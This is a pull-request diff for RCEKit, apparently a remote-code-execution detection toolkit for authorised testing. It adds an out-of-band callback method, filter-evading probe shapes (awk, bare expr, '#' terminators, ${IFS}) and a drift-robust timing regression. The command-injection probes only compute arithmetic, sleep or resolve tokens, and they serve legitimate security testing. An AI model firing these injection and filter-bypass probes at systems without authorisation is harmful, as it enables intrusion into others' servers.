### PR TITLE
feat(detection): close five coverage gaps and a timing false positive

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -8,6 +8,67 @@ formats, or the template schema.
 
 ## [Unreleased]
 
+## [2.22.0] — 2026-08-03
+
+Detection coverage. Measured against a lab of twenty sinks — fifteen genuinely
+vulnerable, five deliberately clean — the results-based methods went from
+confirming 8 of the 15 to confirming 12, with no new false positives on any of
+the clean ones.
+
+### ⚠️ A blind-timing candidate could be pure latency drift
+
+`--methods time` fired its probes in a fixed ascending delay order
+(`0,0,N,N,2N,2N`), which makes the injected delay collinear with the request
+index. A target that simply gets **slower during the run** — progressive load, a
+rate limiter backing off, a filling log — therefore produced a textbook-perfect
+linear fit while being entirely un-injectable. In the lab this reproduced on 8
+of 8 runs against a sink with no command execution anywhere in it.
+
+The probe order is now randomised, and the request index enters the regression
+as a nuisance term, so drift loads onto a drift coefficient instead of
+masquerading as a sleep. The same lab sink now reports negative on 9 of 9 runs,
+with every genuine timing detection preserved. If you have a `needs-review`
+timing candidate from an earlier version against a target that was under load,
+it is worth re-running.
+
+### Added
+
+- **`--methods oob`** — out-of-band detection, the first `confirmed`-tier method
+  for a sink that returns nothing *and* has no writable web root. Starts the
+  built-in HTTP+DNS listener in-process and asks the target to resolve or fetch
+  `<token>.<oob-host>`; a callback carrying a token the target could only have
+  learned by running the command is proof of execution. Each probe gets its own
+  token, so the finding names the break-out that actually worked. One shape puts
+  a computed value in the DNS label, so the callback proves the shell evaluated
+  arithmetic rather than merely resolving a name. Requires `--oob-host`, since
+  it makes the target open outbound connections.
+- **`--probe-depth quick|full`** (default `full`) — trades requests for
+  coverage. `full` adds three probe shapes, each aimed at a filter that silenced
+  the canonical ones: substitution-free (`awk`, bare `expr`) for sinks that strip
+  `$(` and backticks; keyword-diverse (`awk`) for filters on `echo`/`expr`; and
+  comment-terminated (`… #`) for applications that append a redirect, extra
+  arguments or a pipe after the injection point. `quick` keeps the old probe set
+  at roughly half the requests.
+
+### Fixed
+
+- **A `ping '<input>'` sink could not be detected at all.** The
+  `shell_single_quoted`/`shell_double_quoted` contexts exist precisely for input
+  interpolated inside quotes, but they are not in `default_contexts`, so no
+  record carried them and the detection engine never tried them — the one sink
+  shape they exist for was the one shape that always reported clean. They are now
+  probed by default, and skipped when `--contexts` names a selection explicitly.
+- **`--methods time` reported a `;`-filtering sink as negative.** A regression
+  blends its probes into one measurement, so it could not sweep separators the
+  way the results-based methods do and was locked to `; ` alone — while
+  `| sleep 3` delayed on the same sink. It now screens every candidate separator
+  with one cheap probe each, then runs the regression through whichever one
+  actually delayed.
+- **A trailing redirect or pipe in the sink hid a working probe.**
+  `<cmd> <input> 2>/dev/null` and `<cmd> <input> | grep …` swallow the probe's
+  output, so it executed and still read as negative. The comment-terminated
+  shapes comment that tail out.
+
 ## [2.21.1] — 2026-08-02
 
 First release since v2.15.2. The headline is not a new feature — it is that
@@ -113,7 +174,8 @@ this file and have not been restated here.
 - **[2.7.0]**
 - **[2.1.0]**
 
-[Unreleased]: https://github.com/kabiri-labs/rcekit/compare/v2.21.1...HEAD
+[Unreleased]: https://github.com/kabiri-labs/rcekit/compare/v2.22.0...HEAD
+[2.22.0]: https://github.com/kabiri-labs/rcekit/compare/v2.21.1...v2.22.0
 [2.21.1]: https://github.com/kabiri-labs/rcekit/compare/v2.15.2...v2.21.1
 [2.15.2]: https://github.com/kabiri-labs/rcekit/releases/tag/v2.15.2
 [2.7.0]: https://github.com/kabiri-labs/rcekit/releases/tag/v2.7.0

--- a/README.md
+++ b/README.md
@@ -1,6 +1,6 @@
 # RCEKit — prove RCE, don't guess it
 
-**Version 2.21.1** · MIT · Python 3.8+ · zero third-party dependencies
+**Version 2.22.0** · MIT · Python 3.8+ · zero third-party dependencies
 
 RCEKit is an **RCE detection &amp; confirmation toolkit** for authorised penetration
 testing, red teaming, and security research. Point it at a target you are allowed

--- a/docs/guide.md
+++ b/docs/guide.md
@@ -164,8 +164,19 @@ reported separately.
 | Anything, first pass | `reflected,eval` | cheap, safe, no state change |
 | A shell sink (`system()`, backticks, `exec`) | `reflected` | cheap |
 | A template engine or expression language | `eval` | cheap |
-| Execution with no output at all | `time` | slow — each probe waits on a real delay |
+| No output, but the target has egress | `oob` | one listener, no state change (see [Out-of-band callbacks](#out-of-band-callbacks)) |
 | No output, but you control a web root | `file` | writes files (see [No-egress targets](#no-egress-targets)) |
+| Execution with no output and no egress | `time` | slow — each probe waits on a real delay |
+
+**Probe depth trades requests for coverage.** By default (`--probe-depth full`)
+each sink gets three extra probe shapes beyond the canonical ones, because the
+canonical ones share two blind spots: they route their arithmetic through a
+command substitution, and they spell the command `echo`/`expr`. A sink that
+strips `$(` blocks both (`$((` starts with `$(`), and so does a keyword filter —
+while the target stays trivially exploitable through a plain `;`. The extra
+shapes use `awk` and a bare `expr`, and one set comments out whatever the
+application appends after the injection point. Pass `--probe-depth quick` on a
+rate-limited target to halve the requests and send only the canonical probes.
 
 **Scope the environments to cut noise.** The shell methods (`reflected`, `file`,
 `time`) apply to any environment whose runtime reaches a shell — the shell
@@ -215,17 +226,24 @@ for the report.
 ## Injecting inside quotes
 
 If the sink builds `ping '<input>'`, a leading `;` never fires — it is inside the
-quoted string. Use the matching context, whose break-out closes the quote and
-supplies its own separator:
+quoted string. The break-out has to close the quote first, which is what the
+`shell_single_quoted` / `shell_double_quoted` contexts do.
+
+**You no longer have to ask for them.** Both are probed by default, so a quoted
+sink is reached by an ordinary run. Naming `--contexts` explicitly turns that
+off — a narrowed run is a deliberate choice about what to send, and RCEKit will
+not widen it behind you:
 
 ```bash
+# Reaches a quoted sink on its own
+python rcekit.py --acknowledge-consent \
+  --verify-url "https://target.example/ping?ip=FUZZ" --methods reflected
+
+# Only the quoted contexts, when you already know the sink's shape
 python rcekit.py --acknowledge-consent \
   --verify-url "https://target.example/ping?ip=FUZZ" --methods reflected \
-  --contexts shell_single_quoted
+  --contexts shell_single_quoted shell_double_quoted
 ```
-
-Use `shell_double_quoted` for `ping "<input>"`. If you don't know which, pass both
-— they are cheap and mutually exclusive in practice.
 
 ---
 
@@ -268,9 +286,17 @@ injection context or a different separator, not heavier obfuscation.
 
 ## Blind targets
 
-No output channel at all? Timing is the fallback. RCEKit fires a controlled
-`0/N/2N` delay series and requires the response time to track it **linearly** — a
-one-off slow response (jitter, GC pause, noisy neighbour) fails the regression.
+No output channel at all? Reach for `oob` first — it is the only method that can
+*confirm* a blind sink (see [Out-of-band callbacks](#out-of-band-callbacks)).
+Timing is the fallback when the target has no egress either.
+
+RCEKit screens each candidate separator with one cheap probe, then fires a
+controlled `0/N/2N` delay series through whichever one actually delayed, and
+requires the response time to track it — about one second of latency per injected
+second. A one-off slow response (jitter, GC pause, noisy neighbour) fails the
+regression, and so does a target that is merely getting slower as the run goes
+on: the probe order is randomised and the request index is modelled as a separate
+term, so drift cannot masquerade as a sleep.
 
 ```bash
 python rcekit.py --acknowledge-consent \
@@ -319,10 +345,42 @@ freshly random each run.
 
 ## Out-of-band callbacks
 
-For blind classes that reach out — Log4Shell/JNDI, DNS exfil, async jobs — RCEKit
-ships its own HTTP/DNS listener, so you don't need interactsh or Collaborator.
+RCEKit ships its own HTTP/DNS listener, so you don't need interactsh or
+Collaborator. There are two ways to use it.
 
-Generate OOB payloads with a domain you control, then listen and correlate:
+### As a detection method
+
+`--methods oob` starts the listener in-process and drives the whole loop itself:
+it fires probes that ask the target to resolve or fetch `<token>.<oob-host>`,
+waits for the callbacks, and reports each probe by whether *its own* token came
+back. This is the only method that reaches `confirmed` on a sink that returns
+nothing and has no writable web root.
+
+```bash
+python rcekit.py --acknowledge-consent \
+  --verify-url "https://target.example/ping?ip=FUZZ" \
+  --methods reflected,oob --oob-host oob.example.com --listen-dns-port 53
+```
+
+`--oob-host` must be something the **target** can reach that arrives at your
+listener: a domain whose NS records are delegated to this host, or a routable IP.
+With a bare IP the token rides in the URL path instead of a DNS label, and the
+DNS shapes are skipped rather than sent as probes that could never call back.
+
+The DNS shapes matter more than the HTTP ones: egress filtering that blocks
+outbound HTTP usually still lets the resolver out. One shape goes further and
+puts a computed value in the label — `$((a+b)).<token>.<host>` — so the callback
+proves the shell *evaluated arithmetic*, not merely that something resolved a
+name it was handed.
+
+This makes the target open outbound connections, which is why it never runs
+unless you name the host.
+
+### As a standalone listener
+
+For blind classes that reach out on their own schedule — Log4Shell/JNDI, DNS
+exfil, async jobs — generate OOB payloads with a domain you control, then listen
+and correlate:
 
 ```bash
 python rcekit.py --acknowledge-consent --categories oob \

--- a/docs/reference.md
+++ b/docs/reference.md
@@ -44,19 +44,64 @@ starting point — this page is for looking things up once you know what you wan
 
 | Option | Description | Default |
 |---|---|---|
-| `--methods` | Comma-separated: `reflected`, `eval`, `file`, `time` | None |
+| `--methods` | Comma-separated: `reflected`, `eval`, `file`, `oob`, `time` | None |
 | `--webroot` | (`file`) server-side directory the target writes and serves | None |
 | `--web-base-url` | (`file`) base URL that serves `--webroot` | None |
+| `--oob-host` | (`oob`) host the **target** calls back to; required for `oob` | None |
 | `--time-base` | (`time`) base delay `N`; the regression fires `0/N/2N` | `2.0` |
 | `--separators` | Break-out separators for shell probes; `\n` = newline | `; `, `\| `, `\|\| `, `&& `, newline |
 | `--evade` | WAF posture: `none`, or `low` for minimal `${IFS}`-for-spaces | `none` |
+| `--probe-depth` | `full` (also the substitution-free and comment-terminated shapes) or `quick` | `full` |
 
 | `--methods` value | Confirms | Tier it can reach |
 |---|---|---|
 | `reflected` | OS command injection, via computed arithmetic | `confirmed` |
 | `eval` | SSTI / SpEL / OGNL / Groovy / raw `eval()`, via a computed product | `confirmed` |
 | `file` | Execution + a write primitive, via write-and-fetch | `confirmed` |
-| `time` | Blind execution, via a linear `0/N/2N` regression | `needs-review` only |
+| `oob` | Blind execution, via a DNS/HTTP callback carrying a per-probe token | `confirmed` |
+| `time` | Blind execution, via a `0/N/2N` regression | `needs-review` only |
+
+### Probe depth
+
+`full` sends three extra shapes per sink, each aimed at a filter that silences
+the canonical probes:
+
+- **substitution-free** (`awk`, bare `expr`) — both canonical probes route the
+  arithmetic through `$((…))` or a backtick, so a sink that strips `$(` blocks
+  them while remaining exploitable through a plain `;`.
+- **keyword-diverse** (`awk` again) — a filter on `echo`/`expr` blocks both
+  canonical probes; `awk` is not on those blocklists.
+- **comment-terminated** (`… #`) — comments out whatever the application appends
+  after the injection point. A trailing redirect or pipe (`ping <input> 2>/dev/null`,
+  `<cmd> <input> | grep …`) otherwise swallows the probe's output, so the probe
+  executes and still reads as negative.
+
+`quick` sends only the canonical probes — roughly half the requests, for
+rate-limited targets or when the sink's shape is already known.
+
+### Out-of-band detection
+
+`--methods oob` starts the built-in HTTP+DNS listener in-process and asks the
+target to resolve or fetch `<token>.<oob-host>`. It is the only `confirmed`-tier
+method for a sink that returns nothing and has no writable web root — `time`
+tops out at `needs-review` by design, and `file` needs somewhere to write that
+the target also serves.
+
+Each probe carries its own token, so the finding names the break-out that
+actually worked rather than every one that was tried. The DNS shapes matter
+most: egress filtering that blocks outbound HTTP usually still lets the resolver
+out. One shape goes further and puts a computed value in the label
+(`$((a+b)).<token>.<host>`), so the callback proves the shell evaluated
+arithmetic rather than merely resolving a name it was handed.
+
+`--oob-host` must be an address the *target* can reach that arrives at this
+listener: an IP on a routable interface, or a domain whose NS records are
+delegated here. With a bare IP the token rides in the URL path instead of a DNS
+label, and the DNS shapes are skipped rather than sent as probes that could
+never call back.
+
+This makes the target open outbound connections, so it never runs unless you
+name the host.
 
 ## Sink shape
 

--- a/rcekit.py
+++ b/rcekit.py
@@ -8,7 +8,7 @@ import re
 import string
 import sys
 import urllib.parse
-from dataclasses import asdict, dataclass
+from dataclasses import asdict, dataclass, replace as dataclass_replace
 from datetime import datetime, timezone
 from pathlib import Path
 from typing import Any, Dict, Iterator, List, Optional, Set, Tuple
@@ -26,7 +26,7 @@ logger = logging.getLogger(__name__)
 
 # Bump on every change: PATCH for fixes, MINOR for new capabilities, MAJOR for
 # breaking changes to the CLI, output formats, or template schema.
-__version__ = "2.21.1"
+__version__ = "2.22.0"
 
 SAFETY_ORDER = {"safe": 0, "intrusive": 1, "stateful": 2}
 
@@ -1681,6 +1681,42 @@ class RCEKit:
                 break
         return results
 
+    # How many times an aggregate method may answer with a further probe batch.
+    # Two is what a screen-then-measure method needs; the bound exists so a
+    # buggy method cannot drive the engine forever against a live target.
+    MAX_PROBE_ROUNDS = 3
+
+    @staticmethod
+    def _quoted_shell_carriers(carriers: List[PayloadRecord],
+                               carrier_seen: Set[Tuple[str, str]],
+                               config: Dict[str, Any]) -> List[PayloadRecord]:
+        """Extra carriers for the shell-quoted break-out contexts.
+
+        ``shell_single_quoted``/``shell_double_quoted`` are exactly the contexts
+        that fit a ``ping '<input>'`` sink -- input interpolated inside quotes,
+        which every probe built for an unquoted context fails to escape. The
+        generator has always had them, but they are not in ``default_contexts``,
+        so no record carried them and the detection engine never tried them: the
+        one sink shape they exist for was the one shape that could not be
+        detected at all. They are cheap (self-separating, so one body each).
+
+        Skipped when the operator named ``--contexts`` explicitly -- a narrowed
+        run is a deliberate choice about what to send, and widening it behind
+        the operator's back is not this function's call."""
+        if config.get("contexts_explicit"):
+            return []
+        extra: List[PayloadRecord] = []
+        for record in list(carriers):
+            if record.environment not in SHELL_CAPABLE_ENVIRONMENTS:
+                continue
+            for context in sorted(SELF_SEPARATING_CONTEXTS):
+                key = (record.environment, context)
+                if key in carrier_seen:
+                    continue
+                carrier_seen.add(key)
+                extra.append(dataclass_replace(record, context=context))
+        return extra
+
     def run_detection(self, records: Iterator[PayloadRecord], url: str,
                       methods: List[str], method: str = "GET",
                       data: Optional[str] = None, headers: Optional[List[str]] = None,
@@ -1724,6 +1760,7 @@ class RCEKit:
                 continue
             carrier_seen.add(key)
             carriers.append(record)
+        carriers.extend(self._quoted_shell_carriers(carriers, carrier_seen, config or {}))
 
         results: List[Dict[str, Any]] = []
         seen: Set[str] = set()
@@ -1736,16 +1773,40 @@ class RCEKit:
                     # decide once. Each fire's timeout is stretched past its
                     # intended delay so a genuine sleep completes instead of
                     # timing out.
+                    #
+                    # A method may answer with further probes (next_probes) once
+                    # it has seen the batch -- screening cheaply before paying
+                    # for an expensive measurement. Rounds are bounded so a
+                    # method cannot loop the engine.
                     series: List[Tuple[Probe, Observation]] = []
-                    for probe in meth.build_probes(record, rng):
-                        req_timeout = timeout + (probe.delay_s or 0.0) + 2.0
-                        status, body, elapsed = self._fire(
-                            probe.payload, url, method, data, headers, url_location,
-                            resolved_body_location, req_timeout)
-                        series.append((probe, Observation(
-                            status=status, body=body, control_body=control_body, elapsed=elapsed)))
-                        if delay:
-                            time.sleep(delay)
+                    batch = meth.build_probes(record, rng)
+                    for _round in range(self.MAX_PROBE_ROUNDS):
+                        if not batch:
+                            break
+                        for probe in batch:
+                            req_timeout = timeout + (probe.delay_s or 0.0) + 2.0
+                            status, body, elapsed = self._fire(
+                                probe.payload, url, method, data, headers, url_location,
+                                resolved_body_location, req_timeout)
+                            series.append((probe, Observation(
+                                status=status, body=body, control_body=control_body,
+                                elapsed=elapsed)))
+                            if delay:
+                                time.sleep(delay)
+                        batch = meth.next_probes(series)
+                    per_probe = meth.confirm_each(series)
+                    if per_probe is not None:
+                        for probe, verdict in per_probe:
+                            results.append({
+                                "verdict": verdict.status, "detail": verdict.evidence,
+                                "status": None, "payload": probe.payload,
+                                "method": meth.name, "tier": meth.tier,
+                                "environment": record.environment, "context": record.context,
+                                "category": "detection", "expected": probe.expected,
+                            })
+                        if max_payloads and len(results) >= max_payloads:
+                            return results
+                        continue
                     verdict = meth.confirm_series(series)
                     probe = series[-1][0] if series else Probe(payload="", expected="")
                     results.append({
@@ -2185,6 +2246,14 @@ class Probe:
     forbidden: Optional[str] = None
     followup: Optional[Dict[str, Any]] = None
     delay_s: Optional[float] = None
+    # ``expected`` is a bare number (e.g. an arithmetic result with no tag around
+    # it), so the match must be fenced by non-digit boundaries.
+    boundary: bool = False
+    # The command separator this probe broke out with, and which round of an
+    # iterative method built it. Both are bookkeeping for methods that screen
+    # cheaply before committing to an expensive measurement.
+    separator: Optional[str] = None
+    phase: str = "main"
 
 
 @dataclass
@@ -2241,6 +2310,35 @@ class DetectionMethod:
         """Decide from all of this method's probe observations at once. Only
         called for methods with ``aggregate = True``."""
         raise NotImplementedError
+
+    def confirm_each(self, series: "List[Tuple[Probe, Observation]]"
+                     ) -> "Optional[List[Tuple[Probe, Verdict]]]":
+        """Optional per-probe verdicts for an ``aggregate`` method.
+
+        Some methods must observe the whole batch before judging *any* probe —
+        an out-of-band callback can land long after the response that triggered
+        it — yet still have a per-probe answer to give, because each probe
+        carries its own token. Returning a list here makes the engine emit one
+        result per probe instead of a single series verdict, so the report names
+        the exact payload that worked rather than an arbitrary one. Returning
+        ``None`` (the default) keeps the single-verdict behaviour."""
+        return None
+
+    def next_probes(self, series: "List[Tuple[Probe, Observation]]") -> List[Probe]:
+        """Probes to fire after seeing ``series``, or ``[]`` when done.
+
+        Lets an aggregate method screen cheaply before committing to an
+        expensive measurement: a timing regression costs a sleep per probe, so
+        finding *which* separator breaks out with one quick probe each beats
+        running the full regression through every candidate."""
+        return []
+
+    def _depth(self) -> str:
+        """``quick`` (canonical probes only) or ``full`` (the extended
+        vocabulary as well). Extra probe shapes buy coverage on filtered sinks
+        at the cost of more requests, so the operator can trade one for the
+        other."""
+        return self.config.get("probe_depth") or "full"
 
     def _search(self, literal: str, body: str, boundary: bool = False) -> bool:
         """Encoded-aware literal search. Reuse the generator's ``_encoded_search``
@@ -2324,7 +2422,7 @@ class DetectionMethod:
                     or record.context in SELF_SEPARATING_CONTEXTS)
 
     def _wrap_variants(self, record: "PayloadRecord", core: str, windows: bool = False,
-                       evade: bool = True) -> List[str]:
+                       evade: bool = True, terminate: bool = False) -> List[str]:
         """One ready-to-send payload per candidate separator: break out of the
         running command, then escape for the record's serialization context —
         reusing the same context/escape machinery the generator uses for every
@@ -2337,6 +2435,20 @@ class DetectionMethod:
         minimal, not aggressive/noisy evasion. Callers whose command uses a
         redirect (``>``) pass ``evade=False``: ``${IFS}`` around ``>`` yields an
         ambiguous redirect, so those stay canonical."""
+        if terminate:
+            # A trailing '#' comments out whatever the application appends after
+            # the injection point. That suffix is not exotic: `ping <input> -w 5`,
+            # `convert <input> out.png` and `<cmd> <input> 2>/dev/null` all bolt
+            # something on, and a redirect or a pipe there swallows the probe's
+            # output entirely -- the probe executes and still reads as negative.
+            #
+            # Only for an unquoted Unix context: cmd.exe has no '#' comment, and
+            # a context that closes with its own suffix would put the suffix
+            # after the '#' and comment it out instead.
+            ctx = self.gen.contexts.get(record.context, {})
+            if windows or ctx.get("suffix"):
+                return []
+            core = f"{core} #"
         if self._needs_separator(record):
             bodies = [f"{separator}{core}" for separator in self._separators(windows)]
         else:
@@ -2409,10 +2521,51 @@ class ReflectedMath(DetectionMethod):
             core_bt = f"echo {t1}{bt}{t2}"
             probes.extend(Probe(payload=payload, expected=f"{t1}{total}{t2}", forbidden=bt)
                           for payload in self._wrap_variants(record, core_bt))
+            if self._depth() != "quick":
+                probes.extend(self._extended_probes(record, a, b, total, t1, t2, t3, core))
+        return probes
+
+    def _extended_probes(self, record: "PayloadRecord", a: int, b: int, total: int,
+                         t1: str, t2: str, t3: str, core: str) -> List[Probe]:
+        """Probe shapes for sinks the two canonical ones cannot reach.
+
+        Both canonical probes route the arithmetic through a command
+        substitution — ``$((...))`` and a backtick — and both spell the command
+        ``echo``/``expr``. That is two blind spots at once, and each is a filter
+        seen in the wild:
+
+        * a sink that strips ``$(`` blocks ``$((`` too (it is a prefix of it) and
+          also blocks the backtick, so a target exploitable through a plain
+          ``;`` reports clean. ``awk`` and a bare ``expr`` print the result
+          straight to stdout, needing no substitution at all.
+        * a keyword filter on ``echo``/``expr``/``cat``/``id`` blocks both, while
+          ``awk`` is not in anyone's blocklist.
+
+        The bare ``expr`` probe's output is an untagged number, so its match is
+        digit-fenced; the control differential still applies, exactly as for the
+        tagged probes."""
+        probes: List[Probe] = []
+        # Substitution-free and keyword-diverse. awk's concatenation binds looser
+        # than '+', so `"T1" a+b "T2"` prints T1<sum>T2.
+        core_awk = "awk 'BEGIN{print \"%s\" %d+%d \"%s\"}'" % (t1, a, b, t2)
+        awk_literal = f"{a}+{b}"
+        probes.extend(Probe(payload=payload, expected=f"{t1}{total}{t2}", forbidden=awk_literal)
+                      for payload in self._wrap_variants(record, core_awk))
+        core_expr = f"expr {a} + {b}"
+        probes.extend(Probe(payload=payload, expected=str(total), forbidden=f"{a} + {b}",
+                            boundary=True)
+                      for payload in self._wrap_variants(record, core_expr))
+        # Comment-terminated: same proofs, but with whatever the application
+        # appends after the injection point commented out.
+        for terminated, expected, literal in (
+                (core, f"{t1}{total}{t2}{t3}{t1}", f"$(({a}+{b}))"),
+                (core_awk, f"{t1}{total}{t2}", awk_literal)):
+            probes.extend(Probe(payload=payload, expected=expected, forbidden=literal)
+                          for payload in self._wrap_variants(record, terminated, terminate=True))
         return probes
 
     def confirm(self, obs: "Observation", probe: "Probe") -> Verdict:
-        return self._confirm_computed(obs, probe)
+        return self._confirm_computed(obs, probe, boundary=probe.boundary)
 
 
 class FileBased(DetectionMethod):
@@ -2480,10 +2633,25 @@ class FileBased(DetectionMethod):
 class ParametricTime(DetectionMethod):
     """Hardened blind timing. Instead of a single margin over one slow response,
     fire a controlled series of delays (``d ∈ {0, N, 2N}``, each repeated) and
-    require the response time to track the injected delay **linearly** — a
-    monotonic increase whose extra latency at each step matches the intended
-    sleep within a noise margin. Jitter cannot fake a linear response to a
-    controlled delay.
+    require the response time to track the injected delay — a slope of about one
+    second of latency per injected second. Jitter cannot fake that.
+
+    Two confounds the naive version of this gets wrong, both handled here:
+
+    * **Which separator breaks out.** A regression blends every probe into one
+      measurement, so it cannot sweep separators the way the results-based
+      methods do — mixing a working break-out with broken ones destroys the
+      signal. Firing a full regression through *every* candidate separator costs
+      a sleep per probe per separator, which is why this screens first: one cheap
+      probe per separator, then the regression through whichever one actually
+      delayed.
+    * **Latency drift.** Probes fired in ascending delay order make the injected
+      delay collinear with the request index, so a target that simply gets slower
+      during the run — progressive load, a rate limiter backing off, a filling
+      log — produces a textbook-perfect linear fit while being entirely
+      un-injectable. The order is randomised *and* the request index enters the
+      model as a nuisance term, so drift loads onto the drift coefficient rather
+      than masquerading as a sleep.
 
     Timing has no value the target *computed*, so by design this never confirms
     on its own — its ceiling is ``needs-review``. Pair it with ``--methods
@@ -2492,55 +2660,152 @@ class ParametricTime(DetectionMethod):
     name = "time"
     tier = "needs-review"
     aggregate = True
+    # Per-carrier state, set by build_probes before next_probes/confirm_series
+    # ever run. Declared here so a partially-driven instance is still coherent.
+    _record: Optional["PayloadRecord"] = None
+    _rng: Optional["random.Random"] = None
+    _separator: Optional[str] = None
 
     def applicable(self, record: "PayloadRecord") -> bool:
         return record.environment in SHELL_CAPABLE_ENVIRONMENTS
 
+    def _sleep_core(self, delay: float, windows: bool) -> str:
+        if windows:
+            # `ping -n k` waits ~(k-1)s; +1 so d=0 is a single instant ping.
+            return f"ping 127.0.0.1 -n {int(round(delay)) + 1} >nul"
+        return f"sleep {delay:g}"
+
     def build_probes(self, record: "PayloadRecord", rng: "random.Random") -> List[Probe]:
+        """Round one: screen the separators. One probe at delay 0 and one at the
+        base delay per candidate separator, so the expensive regression is only
+        ever run through a break-out that demonstrably reached a shell."""
+        self._record = record
+        self._rng = rng
         base = float(self.config.get("time_base", 2.0))
-        repeats = max(1, int(self.config.get("time_repeats", 2)))
         windows = record.environment == "windows"
+        separators = (self._separators(windows) if self._needs_separator(record) else (None,))
+        if self._depth() == "quick":
+            separators = separators[:1]
+        probes = [Probe(payload=self._payload(record, 0.0, sep, windows), expected="",
+                        delay_s=0.0, separator=sep, phase="screen")
+                  for sep in separators]
+        probes += [Probe(payload=self._payload(record, base, sep, windows), expected="",
+                         delay_s=base, separator=sep, phase="screen")
+                   for sep in separators]
+        rng.shuffle(probes)
+        return probes
+
+    def _payload(self, record: "PayloadRecord", delay: float, separator: Optional[str],
+                 windows: bool) -> str:
+        body = self._sleep_core(delay, windows)
+        if separator is not None:
+            body = f"{separator}{body}"
+        # Same low-touch transform, applied to the whole body (separator
+        # included) exactly as _wrap_variants does it, so the two paths cannot
+        # drift apart.
+        if self.config.get("evade") == "low" and not windows:
+            body = body.replace(" ", "${IFS}")
+        return self._wrap_context(record, body)
+
+    def next_probes(self, series: "List[Tuple[Probe, Observation]]") -> List[Probe]:
+        """Round two: the full regression, through the separator that delayed
+        most in the screen. Returns ``[]`` when no separator delayed (nothing to
+        measure) or once the regression has already been fired."""
+        if any(probe.phase == "regress" for probe, _ in series):
+            return []
+        base = float(self.config.get("time_base", 2.0))
+        repeats = max(1, int(self.config.get("time_repeats", 3)))
+        windows = self._record.environment == "windows"
+        quick = {}
+        slow = {}
+        for probe, obs in series:
+            if obs.status is None:
+                continue
+            (quick if (probe.delay_s or 0.0) == 0.0 else slow)[probe.separator] = obs.elapsed
+        # A separator worked if its delayed probe cleared its own zero-delay
+        # probe by most of the injected delay. Requiring the *pair* keeps a
+        # uniformly slow endpoint from looking like a break-out.
+        gains = {sep: slow[sep] - quick.get(sep, 0.0) for sep in slow if sep in quick}
+        candidates = [sep for sep, gain in gains.items() if gain >= 0.6 * base]
+        if not candidates:
+            return []
+        best = max(candidates, key=lambda sep: gains[sep])
+        self._separator = best
         probes: List[Probe] = []
         for multiplier in (0, 1, 2):
             delay = base * multiplier
             for _ in range(repeats):
-                if windows:
-                    # `ping -n k` waits ~(k-1)s; +1 so d=0 is a single instant ping.
-                    core = f"ping 127.0.0.1 -n {int(round(delay)) + 1} >nul"
-                else:
-                    core = f"sleep {delay:g}"
-                probes.append(Probe(payload=self._wrap(record, core, windows=windows),
-                                    expected="", delay_s=delay))
+                probes.append(Probe(payload=self._payload(self._record, delay, best, windows),
+                                    expected="", delay_s=delay, separator=best, phase="regress"))
+        # Randomise the fire order so the injected delay is decorrelated from the
+        # request index, which is what makes the drift term below identifiable.
+        self._rng.shuffle(probes)
         return probes
 
     def confirm_series(self, series: "List[Tuple[Probe, Observation]]") -> Verdict:
-        import statistics
-        if any(obs.status is None for _, obs in series):
+        regression = [(p, o) for p, o in series if p.phase == "regress"]
+        if not regression:
+            screened = ", ".join(
+                f"{(p.separator or 'bare').strip() or 'newline'}={o.elapsed:.2f}s"
+                for p, o in series if (p.delay_s or 0.0) > 0)
+            if any(o.status is None for _, o in series):
+                return Verdict("error", "one or more timing probes never reached the target "
+                                        "(delivery/TLS failure); regression not judged")
+            return Verdict("negative",
+                           f"no command separator produced a delay, so no regression was run "
+                           f"({screened or 'no samples'})")
+        if any(obs.status is None for _, obs in regression):
             return Verdict("error", "one or more timing probes never reached the target "
                                     "(delivery/TLS failure); regression not judged")
-        by_delay: Dict[float, List[float]] = {}
-        for probe, obs in series:
-            by_delay.setdefault(probe.delay_s or 0.0, []).append(obs.elapsed)
-        delays = sorted(by_delay)
-        if len(delays) < 2:
+
+        delays = [p.delay_s or 0.0 for p, _ in regression]
+        elapsed = [o.elapsed for _, o in regression]
+        index = [float(i) for i in range(len(regression))]
+        n = len(regression)
+        if n < 4 or len(set(delays)) < 2:
             return Verdict("negative", "insufficient timing samples for a regression")
-        median = {d: statistics.median(samples) for d, samples in by_delay.items()}
-        baseline = median[delays[0]]
-        spread0 = max(by_delay[delays[0]]) - min(by_delay[delays[0]])
-        noise = max(0.15, 3 * spread0)
-        summary = ", ".join(f"d={d:g}s→{median[d]:.2f}s" for d in delays)
-        previous = baseline
-        for delay in delays[1:]:
-            extra = median[delay] - baseline
-            tolerance = max(0.4, noise, 0.5 * delay)
-            if median[delay] <= previous:
-                return Verdict("negative", f"response time not monotonic in the delay ({summary})")
-            if abs(extra - delay) > tolerance:
-                return Verdict("negative", f"response time does not track the delay ({summary})")
-            previous = median[delay]
+
+        # Least squares for elapsed ~ intercept + b_delay*delay + b_drift*index.
+        # Two predictors and a constant, solved in closed form -- no third-party
+        # dependency, and cheap enough to be irrelevant next to the sleeps.
+        mean_d = sum(delays) / n
+        mean_i = sum(index) / n
+        mean_e = sum(elapsed) / n
+        cd = [x - mean_d for x in delays]
+        ci = [x - mean_i for x in index]
+        ce = [x - mean_e for x in elapsed]
+        s_dd = sum(x * x for x in cd)
+        s_ii = sum(x * x for x in ci)
+        s_di = sum(x * y for x, y in zip(cd, ci))
+        s_de = sum(x * y for x, y in zip(cd, ce))
+        s_ie = sum(x * y for x, y in zip(ci, ce))
+        det = s_dd * s_ii - s_di * s_di
+        if det <= 0:
+            return Verdict("negative",
+                           "timing design degenerate (delay and request order collinear)")
+        b_delay = (s_de * s_ii - s_ie * s_di) / det
+        b_drift = (s_ie * s_dd - s_de * s_di) / det
+        intercept = mean_e - b_delay * mean_d - b_drift * mean_i
+        residuals = [e - (intercept + b_delay * d + b_drift * i)
+                     for e, d, i in zip(elapsed, delays, index)]
+        sigma = (sum(r * r for r in residuals) / max(1, n - 3)) ** 0.5
+        stderr_delay = sigma * (s_ii / det) ** 0.5
+
+        sep = (self._separator or "bare").strip() or "newline"
+        observed = ", ".join(f"d={d:g}s→{e:.2f}s" for d, e in sorted(zip(delays, elapsed)))
+        summary = (f"{observed} | slope {b_delay:.2f}s per injected second, "
+                   f"drift {b_drift:+.2f}s per request, separator {sep!r}")
+        # A real sleep moves the response one second per injected second.
+        if not 0.6 <= b_delay <= 1.4:
+            return Verdict("negative", f"response time does not track the delay ({summary})")
+        # ...and the delay term has to stand clear of the residual noise, or the
+        # slope is an artefact of a handful of jittery samples.
+        if stderr_delay > 0 and b_delay < 3 * stderr_delay:
